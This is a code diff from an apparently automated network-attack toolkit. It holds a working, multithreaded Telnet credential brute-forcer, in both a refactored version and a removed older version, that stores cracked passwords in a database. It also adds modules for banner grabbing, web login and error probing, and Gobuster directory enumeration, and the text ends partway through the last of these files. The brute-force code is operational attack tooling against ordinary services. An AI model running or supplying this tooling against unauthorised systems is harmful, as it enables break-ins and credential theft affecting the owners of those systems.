tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
time.sleep(2)
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
try:
tn.close()
except Exception:
pass
if response[0] == 2 or response[0] == 3:
return True
except Exception:
pass
return False
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('telnet',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='telnet'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for Telnet bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.telnet_connect(adresse_ip, user, password, port=port):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_telnet", 0) > 0:
time.sleep(self.shared_data.timewait_telnet)
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"Telnet dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
for mac, ip, hostname, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="telnet",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=None
)
else:
logger.error(f"insert_cred failed for {ip} {user}: {e}")
self.results = []
def removeduplicates(self):
pass
if __name__ == "__main__":
try:
sd = SharedData()
telnet_bruteforce = TelnetBruteforce(sd)
logger.info("Telnet brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,206 +0,0 @@
"""
telnet_connector.py - This script performs a brute-force attack on Telnet servers using a list of credentials,
and logs the successful login attempts.
"""
import os
import pandas as pd
import telnetlib
import threading
import logging
import time
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="telnet_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "TelnetBruteforce"
b_module = "telnet_connector"
b_status = "brute_force_telnet"
b_port = 23
b_parent = None
class TelnetBruteforce:
"""
Class to handle the brute-force attack process for Telnet servers.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.telnet_connector = TelnetConnector(shared_data)
logger.info("TelnetConnector initialized.")
def bruteforce_telnet(self, ip, port):
"""
Perform brute-force attack on a Telnet server.
"""
return self.telnet_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute-force attack.
"""
self.shared_data.bjornorch_status = "TelnetBruteforce"
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""
Class to handle Telnet connections and credential testing.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.telnetfile = shared_data.telnetfile
# If the file does not exist, it will be created
if not os.path.exists(self.telnetfile):
logger.info(f"File {self.telnetfile} does not exist. Creating...")
with open(self.telnetfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for Telnet ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
def telnet_connect(self, adresse_ip, user, password):
"""
Establish a Telnet connection and try to log in with the provided credentials.
"""
try:
tn = telnetlib.Telnet(adresse_ip)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
# Wait to see if the login was successful
time.sleep(2)
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
tn.close()
# Check if the login was successful
if response[0] == 2 or response[0] == 3:
return True
except Exception as e:
pass
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.telnet_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing Telnet...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful login attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.telnetfile, index=False, mode='a', header=not os.path.exists(self.telnetfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results file.
"""
df = pd.read_csv(self.telnetfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.telnetfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
telnet_bruteforce = TelnetBruteforce(shared_data)
logger.info("Starting Telnet brute-force attack on port 23...")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute-force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing TelnetBruteforce on {ip}...")
telnet_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successes: {len(telnet_bruteforce.telnet_connector.results)}")
exit(len(telnet_bruteforce.telnet_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

191
actions/thor_hammer.py Normal file
View File

@@ -0,0 +1,191 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
thor_hammer.py — Service fingerprinting (Pi Zero friendly, orchestrator compatible).
What it does:
- For a given target (ip, port), tries a fast TCP connect + banner grab.
- Optionally stores a service fingerprint into DB.port_services via db.upsert_port_service.
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
Notes:
- Avoids spawning nmap per-port (too heavy). If you want nmap, add a dedicated action.
"""
import logging
import socket
import time
from typing import Dict, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="thor_hammer.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "ThorHammer"
b_module = "thor_hammer"
b_status = "ThorHammer"
b_port = None
b_parent = None
b_service = '["ssh","ftp","telnet","http","https","smb","mysql","postgres","mssql","rdp","vnc"]'
b_trigger = "on_port_change"
b_priority = 35
b_action = "normal"
b_cooldown = 1200
b_rate_limit = "24/86400"
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
def _guess_service_from_port(port: int) -> str:
mapping = {
21: "ftp",
22: "ssh",
23: "telnet",
25: "smtp",
53: "dns",
80: "http",
110: "pop3",
139: "netbios-ssn",
143: "imap",
443: "https",
445: "smb",
1433: "mssql",
3306: "mysql",
3389: "rdp",
5432: "postgres",
5900: "vnc",
8080: "http",
}
return mapping.get(int(port), "")
class ThorHammer:
def __init__(self, shared_data):
self.shared_data = shared_data
def _connect_and_banner(self, ip: str, port: int, timeout_s: float, max_bytes: int) -> Tuple[bool, str]:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout_s)
try:
if s.connect_ex((ip, int(port))) != 0:
return False, ""
try:
data = s.recv(max_bytes)
banner = (data or b"").decode("utf-8", errors="ignore").strip()
except Exception:
banner = ""
return True, banner
finally:
try:
s.close()
except Exception:
pass
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else None
except Exception:
port_i = None
# If port is missing, try to infer from row 'Ports' and fingerprint a few.
ports_to_check = []
if port_i:
ports_to_check = [port_i]
else:
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for p in ports_txt.split(";"):
p = p.strip()
if p.isdigit():
ports_to_check.append(int(p))
ports_to_check = ports_to_check[:12] # Pi Zero guard
if not ports_to_check:
return "failed"
timeout_s = float(getattr(self.shared_data, "thor_connect_timeout_s", 1.5))
max_bytes = int(getattr(self.shared_data, "thor_banner_max_bytes", 1024))
source = str(getattr(self.shared_data, "thor_source", "thor_hammer"))
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
self.shared_data.bjorn_orch_status = "ThorHammer"
self.shared_data.bjorn_status_text2 = ip
self.shared_data.comment_params = {"ip": ip, "port": str(ports_to_check[0])}
progress = ProgressTracker(self.shared_data, len(ports_to_check))
try:
any_open = False
for p in ports_to_check:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
ok, banner = self._connect_and_banner(ip, p, timeout_s=timeout_s, max_bytes=max_bytes)
any_open = any_open or ok
service = _guess_service_from_port(p)
product = ""
version = ""
fingerprint = banner[:200] if banner else ""
confidence = 0.4 if ok else 0.1
state = "open" if ok else "closed"
self.shared_data.comment_params = {
"ip": ip,
"port": str(p),
"open": str(int(ok)),
"svc": service or "?",
}
# Persist to DB if method exists.
try:
if hasattr(self.shared_data, "db") and hasattr(self.shared_data.db, "upsert_port_service"):
self.shared_data.db.upsert_port_service(
mac_address=mac or "",
ip=ip,
port=int(p),
protocol="tcp",
state=state,
service=service or None,
product=product or None,
version=version or None,
banner=banner or None,
fingerprint=fingerprint or None,
confidence=float(confidence),
source=source,
)
except Exception as e:
logger.error(f"DB upsert_port_service failed for {ip}:{p}: {e}")
progress.advance(1)
progress.set_complete()
return "success" if any_open else "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug/manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="ThorHammer (service fingerprint)")
parser.add_argument("--ip", required=True)
parser.add_argument("--port", default="22")
args = parser.parse_args()
sd = SharedData()
act = ThorHammer(sd)
row = {"MAC Address": sd.get_raspberry_mac() or "__GLOBAL__", "Hostname": "", "Ports": args.port}
print(act.execute(args.ip, args.port, row, "ThorHammer"))

396
actions/valkyrie_scout.py Normal file
View File

@@ -0,0 +1,396 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
valkyrie_scout.py — Web surface scout (Pi Zero friendly, orchestrator compatible).
What it does:
- Probes a small set of common web paths on a target (ip, port).
- Extracts high-signal indicators from responses (auth type, login form hints, missing security headers,
error/debug strings). No exploitation, no bruteforce.
- Writes results into DB table `webenum` (tool='valkyrie_scout') so the UI can browse findings.
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import re
import ssl
import time
from http.client import HTTPConnection, HTTPSConnection, RemoteDisconnected
from typing import Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="valkyrie_scout.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "ValkyrieScout"
b_module = "valkyrie_scout"
b_status = "ValkyrieScout"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_web_service"
b_priority = 50
b_action = "normal"
b_cooldown = 1800
b_rate_limit = "8/86400"
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
# Small default list to keep the action cheap on Pi Zero.
DEFAULT_PATHS = [
"/",
"/robots.txt",
"/login",
"/signin",
"/auth",
"/admin",
"/administrator",
"/wp-login.php",
"/user/login",
]
# Keep patterns minimal and high-signal.
SQLI_ERRORS = [
"error in your sql syntax",
"mysql_fetch",
"unclosed quotation mark",
"ora-",
"postgresql",
"sqlite error",
]
LFI_HINTS = [
"include(",
"require(",
"include_once(",
"require_once(",
]
DEBUG_HINTS = [
"stack trace",
"traceback",
"exception",
"fatal error",
"notice:",
"warning:",
"debug",
]
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _first_hostname_from_row(row: Dict) -> str:
try:
hn = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hn:
hn = hn.split(";", 1)[0].strip()
return hn
except Exception:
return ""
def _lower_headers(headers: Dict[str, str]) -> Dict[str, str]:
out = {}
for k, v in (headers or {}).items():
if not k:
continue
out[str(k).lower()] = str(v)
return out
def _detect_signals(status: int, headers: Dict[str, str], body_snippet: str) -> Dict[str, object]:
h = _lower_headers(headers)
www = h.get("www-authenticate", "")
set_cookie = h.get("set-cookie", "")
auth_type = None
if status == 401 and "basic" in www.lower():
auth_type = "basic"
elif status == 401 and "digest" in www.lower():
auth_type = "digest"
snippet = (body_snippet or "").lower()
has_form = "<form" in snippet
has_password = "type=\"password\"" in snippet or "type='password'" in snippet
looks_like_login = bool(has_form and has_password) or any(x in snippet for x in ["login", "sign in", "connexion"])
csrf_markers = [
"csrfmiddlewaretoken",
"authenticity_token",
"csrf_token",
"name=\"_token\"",
"name='_token'",
]
has_csrf = any(m in snippet for m in csrf_markers)
missing_headers = []
for header in [
"x-frame-options",
"x-content-type-options",
"content-security-policy",
"referrer-policy",
]:
if header not in h:
missing_headers.append(header)
# HSTS is only relevant on HTTPS.
if "strict-transport-security" not in h:
missing_headers.append("strict-transport-security")
rate_limited_hint = (status == 429) or ("retry-after" in h) or ("x-ratelimit-remaining" in h)
# Very cheap "issue hints"
issues = []
for s in SQLI_ERRORS:
if s in snippet:
issues.append("sqli_error_hint")
break
for s in LFI_HINTS:
if s in snippet:
issues.append("lfi_hint")
break
for s in DEBUG_HINTS:
if s in snippet:
issues.append("debug_hint")
break
cookie_names = []
if set_cookie:
for part in set_cookie.split(","):
name = part.split(";", 1)[0].split("=", 1)[0].strip()
if name and name not in cookie_names:
cookie_names.append(name)
return {
"auth_type": auth_type,
"looks_like_login": bool(looks_like_login),
"has_csrf": bool(has_csrf),
"missing_security_headers": missing_headers[:12],
"rate_limited_hint": bool(rate_limited_hint),
"issues": issues[:8],
"cookie_names": cookie_names[:12],
"server": h.get("server", ""),
"x_powered_by": h.get("x-powered-by", ""),
}
class ValkyrieScout:
def __init__(self, shared_data):
self.shared_data = shared_data
self._ssl_ctx = ssl._create_unverified_context()
def _fetch(
self,
*,
ip: str,
port: int,
scheme: str,
path: str,
timeout_s: float,
user_agent: str,
max_bytes: int,
) -> Tuple[int, Dict[str, str], str, int, int]:
started = time.time()
headers_out: Dict[str, str] = {}
status = 0
size = 0
body_snip = ""
conn = None
try:
if scheme == "https":
conn = HTTPSConnection(ip, port=port, timeout=timeout_s, context=self._ssl_ctx)
else:
conn = HTTPConnection(ip, port=port, timeout=timeout_s)
conn.request("GET", path, headers={"User-Agent": user_agent, "Accept": "*/*"})
resp = conn.getresponse()
status = int(resp.status or 0)
for k, v in resp.getheaders():
if k and v:
headers_out[str(k)] = str(v)
chunk = resp.read(max_bytes)
size = len(chunk or b"")
try:
body_snip = (chunk or b"").decode("utf-8", errors="ignore")
except Exception:
body_snip = ""
except (ConnectionError, TimeoutError, RemoteDisconnected):
status = 0
except Exception:
status = 0
finally:
try:
if conn:
conn.close()
except Exception:
pass
elapsed_ms = int((time.time() - started) * 1000)
return status, headers_out, body_snip, size, elapsed_ms
def _db_upsert(
self,
*,
mac: str,
ip: str,
hostname: str,
port: int,
path: str,
status: int,
size: int,
response_ms: int,
content_type: str,
payload: dict,
user_agent: str,
):
try:
headers_json = json.dumps(payload, ensure_ascii=True)
except Exception:
headers_json = ""
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'valkyrie_scout', 'GET', ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
user_agent = COALESCE(excluded.user_agent, webenum.user_agent),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
path or "/",
int(status),
int(size or 0),
int(response_ms or 0),
content_type or "",
user_agent or "",
headers_json,
),
)
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else int(getattr(self, "port", 80) or 80)
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
hostname = _first_hostname_from_row(row)
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
timeout_s = float(getattr(self.shared_data, "web_probe_timeout_s", 4.0))
user_agent = str(getattr(self.shared_data, "web_probe_user_agent", "BjornWebScout/1.0"))
max_bytes = int(getattr(self.shared_data, "web_probe_max_bytes", 65536))
delay_s = float(getattr(self.shared_data, "valkyrie_delay_s", 0.05))
paths = getattr(self.shared_data, "valkyrie_scout_paths", None)
if not isinstance(paths, list) or not paths:
paths = DEFAULT_PATHS
# UI
self.shared_data.bjorn_orch_status = "ValkyrieScout"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i)}
progress = ProgressTracker(self.shared_data, len(paths))
try:
for p in paths:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
path = str(p or "/").strip()
if not path.startswith("/"):
path = "/" + path
status, headers, body, size, elapsed_ms = self._fetch(
ip=ip,
port=port_i,
scheme=scheme,
path=path,
timeout_s=timeout_s,
user_agent=user_agent,
max_bytes=max_bytes,
)
# Only keep minimal info; do not store full HTML.
ctype = headers.get("Content-Type") or headers.get("content-type") or ""
signals = _detect_signals(status, headers, body)
payload = {
"signals": signals,
"sample": {"status": int(status), "content_type": ctype, "rt_ms": int(elapsed_ms)},
}
try:
self._db_upsert(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
path=path,
status=status or 0,
size=size,
response_ms=elapsed_ms,
content_type=ctype,
payload=payload,
user_agent=user_agent,
)
except Exception as e:
logger.error(f"DB write failed for {ip}:{port_i}{path}: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": path,
"status": str(status),
"login": str(int(bool(signals.get("looks_like_login") or signals.get("auth_type")))),
}
progress.advance(1)
if delay_s > 0:
time.sleep(delay_s)
progress.set_complete()
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug/manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="ValkyrieScout (light web scout)")
parser.add_argument("--ip", required=True)
parser.add_argument("--port", default="80")
args = parser.parse_args()
sd = SharedData()
act = ValkyrieScout(sd)
row = {"MAC Address": sd.get_raspberry_mac() or "__GLOBAL__", "Hostname": ""}
print(act.execute(args.ip, args.port, row, "ValkyrieScout"))

424
actions/web_enum.py Normal file
View File

@@ -0,0 +1,424 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`.
- Writes each finding into the `webenum` table in REAL-TIME (Streaming).
- Updates bjorn_progress with actual percentage (0-100%).
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit) immediately.
- No filesystem output: parse Gobuster stdout/stderr directly.
- Filtrage dynamique des statuts HTTP via shared_data.web_status_codes.
"""
import re
import socket
import subprocess
import threading
import logging
import time
import os
import select
from typing import List, Dict, Tuple, Optional, Set
from shared import SharedData
from logger import Logger
# -------------------- Logger & module meta --------------------
logger = Logger(name="web_enum.py", level=logging.DEBUG)
b_class = "WebEnumeration"
b_module = "web_enum"
b_status = "WebEnumeration"
b_port = 80
b_service = '["http","https"]'
b_trigger = 'on_any:["on_web_service","on_new_port:80","on_new_port:443","on_new_port:8080","on_new_port:8443","on_new_port:9443","on_new_port:8000","on_new_port:8888","on_new_port:81","on_new_port:5000","on_new_port:5001","on_new_port:7080","on_new_port:9080"]'
b_parent = None
b_priority = 9
b_cooldown = 1800
b_rate_limit = '3/86400'
b_enabled = 1
# -------------------- Defaults & parsing --------------------
DEFAULT_WEB_STATUS_CODES = [
200, 201, 202, 203, 204, 206,
301, 302, 303, 307, 308,
401, 403, 405,
"5xx",
]
ANSI_RE = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
CTL_RE = re.compile(r"[\x00-\x1F\x7F]") # non-printables
# Gobuster "dir" line examples handled:
# /admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/]
GOBUSTER_LINE = re.compile(
r"""^(?P<path>\S+)\s*
\(Status:\s*(?P<status>\d{3})\)\s*
(?:\[Size:\s*(?P<size>\d+)\])?
(?:\s*\[\-\-\>\s*(?P<redir>[^\]]+)\])?
""",
re.VERBOSE
)
# Regex pour capturer la progression de Gobuster sur stderr
# Ex: "Progress: 1024 / 4096 (25.00%)"
GOBUSTER_PROGRESS_RE = re.compile(r"Progress:\s+(?P<current>\d+)\s*/\s+(?P<total>\d+)")
def _normalize_status_policy(policy) -> Set[int]:
"""
Transforme une politique "UI" en set d'entiers HTTP.
"""
codes: Set[int] = set()
if not policy:
policy = DEFAULT_WEB_STATUS_CODES
for item in policy:
try:
if isinstance(item, int):
if 100 <= item <= 599:
codes.add(item)
elif isinstance(item, str):
s = item.strip().lower()
if s.endswith("xx") and len(s) == 3 and s[0].isdigit():
base = int(s[0]) * 100
codes.update(range(base, base + 100))
elif "-" in s:
a, b = s.split("-", 1)
a, b = int(a), int(b)
a, b = max(100, a), min(599, b)
if a <= b:
codes.update(range(a, b + 1))
else:
v = int(s)
if 100 <= v <= 599:
codes.add(v)
except Exception:
logger.warning(f"Ignoring invalid status code token: {item!r}")
return codes
class WebEnumeration:
"""
Orchestrates Gobuster web dir enum and writes normalized results into DB.
Streaming mode: Reads stdout/stderr in real-time for DB inserts and Progress UI.
"""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.gobuster_path = "/usr/bin/gobuster" # verify with `which gobuster`
self.wordlist = self.shared_data.common_wordlist
self.lock = threading.Lock()
# Cache pour la taille de la wordlist (pour le calcul du %)
self.wordlist_size = 0
self._count_wordlist_lines()
# ---- Sanity checks
self._available = True
if not os.path.exists(self.gobuster_path):
logger.error(f"Gobuster not found at {self.gobuster_path}")
self._available = False
if not os.path.exists(self.wordlist):
logger.error(f"Wordlist not found: {self.wordlist}")
self._available = False
# Politique venant de lUI : créer si absente
if not hasattr(self.shared_data, "web_status_codes") or not self.shared_data.web_status_codes:
self.shared_data.web_status_codes = DEFAULT_WEB_STATUS_CODES.copy()
logger.info(
f"WebEnumeration initialized (Streaming Mode). "
f"Wordlist lines: {self.wordlist_size}. "
f"Policy: {self.shared_data.web_status_codes}"
)
def _count_wordlist_lines(self):
"""Compte les lignes de la wordlist une seule fois pour calculer le %."""
if self.wordlist and os.path.exists(self.wordlist):
try:
# Lecture rapide bufferisée
with open(self.wordlist, 'rb') as f:
self.wordlist_size = sum(1 for _ in f)
except Exception as e:
logger.error(f"Error counting wordlist lines: {e}")
self.wordlist_size = 0
# -------------------- Utilities --------------------
def _scheme_for_port(self, port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _reverse_dns(self, ip: str) -> Optional[str]:
try:
name, _, _ = socket.gethostbyaddr(ip)
return name
except Exception:
return None
def _extract_identity(self, row: Dict) -> Tuple[str, Optional[str]]:
"""Return (mac_address, hostname) from a row with tolerant keys."""
mac = row.get("mac_address") or row.get("mac") or row.get("MAC") or ""
hostname = row.get("hostname") or row.get("Hostname") or None
return str(mac), (str(hostname) if hostname else None)
# -------------------- Filter helper --------------------
def _allowed_status_set(self) -> Set[int]:
"""Recalcule à chaque run pour refléter une mise à jour UI en live."""
try:
return _normalize_status_policy(getattr(self.shared_data, "web_status_codes", None))
except Exception as e:
logger.error(f"Failed to load shared_data.web_status_codes: {e}")
return _normalize_status_policy(DEFAULT_WEB_STATUS_CODES)
# -------------------- DB Writer --------------------
def _db_add_result(self,
mac_address: str,
ip: str,
hostname: Optional[str],
port: int,
directory: str,
status: int,
size: int = 0,
response_time: int = 0,
content_type: Optional[str] = None,
tool: str = "gobuster") -> None:
"""Upsert a single record into `webenum`."""
try:
self.shared_data.db.execute("""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
tool = COALESCE(excluded.tool, webenum.tool),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""", (mac_address, ip, hostname, int(port), directory, int(status),
int(size or 0), int(response_time or 0), content_type, tool))
logger.debug(f"DB upsert: {ip}:{port}{directory} -> {status} (size={size})")
except Exception as e:
logger.error(f"DB insert error for {ip}:{port}{directory}: {e}")
# -------------------- Public API (Streaming Version) --------------------
def execute(self, ip: str, port: int, row: Dict, status_key: str) -> str:
"""
Run gobuster on (ip,port), STREAM stdout/stderr, upsert findings real-time.
Updates bjorn_progress with 0-100% completion.
Returns: 'success' | 'failed' | 'interrupted'
"""
if not self._available:
return 'failed'
try:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
scheme = self._scheme_for_port(port)
base_url = f"{scheme}://{ip}:{port}"
# Setup Initial UI
self.shared_data.comment_params = {"ip": ip, "port": str(port), "url": base_url}
